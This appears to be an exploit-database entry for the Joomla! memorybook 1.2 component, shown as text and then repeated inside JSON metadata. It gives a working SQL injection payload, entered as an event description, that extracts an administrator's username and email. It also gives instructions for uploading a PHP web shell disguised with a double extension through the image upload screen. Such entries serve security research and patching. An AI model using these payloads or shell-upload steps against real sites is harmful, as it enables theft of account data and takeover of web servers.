SQL Injection
-------------
requires: magic quotes OFF, user account
Add this as the description of a new event:
'), ( 63,(SELECT CONCAT(username,0x20,email) FROM #__users WHERE gid=25
LIMIT 1),1,1,1) -- '
NOTE: 63 MUST be your Joomla user ID. extracted info can be found on
View Events page
Remote File Inclusion
---------------------
requires: user account
Just upload your PHP shell (shell.jpg.php) through the Add Image screen,
and find it's new URL in the View Images screen.
{"lastseen": "2020-04-01T19:04:24", "references": [], "description": "\nJoomla! Component memorybook 1.2 - Multiple Vulnerabilities", "edition": 1, "reporter": "jdc", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2009-12-27T00:00:00", "title": "Joomla! Component memorybook 1.2 - Multiple Vulnerabilities", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:24", "rev": 2}, "score": {"value": 0.6, "vector": "NONE", "modified": "2020-04-01T19:04:24", "rev": 2}, "vulnersScore": 0.6}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-12-27T00:00:00", "id": "EXPLOITPACK:42B0E70ADA6276668F843DB35DEC61FC", "href": "", "viewCount": 1, "sourceData": "SQL Injection\n-------------\n\nrequires: magic quotes OFF, user account\n\nAdd this as the description of a new event:\n\n'), ( 63,(SELECT CONCAT(username,0x20,email) FROM #__users WHERE gid=25 \nLIMIT 1),1,1,1) -- '\n\nNOTE: 63 MUST be your Joomla user ID. extracted info can be found on \nView Events page\n\n\nRemote File Inclusion\n---------------------\n\nrequires: user account\n\nJust upload your PHP shell (shell.jpg.php) through the Add Image screen, \nand find it's new URL in the View Images screen.", "cvss": {"score": 0.0, "vector": "NONE"}}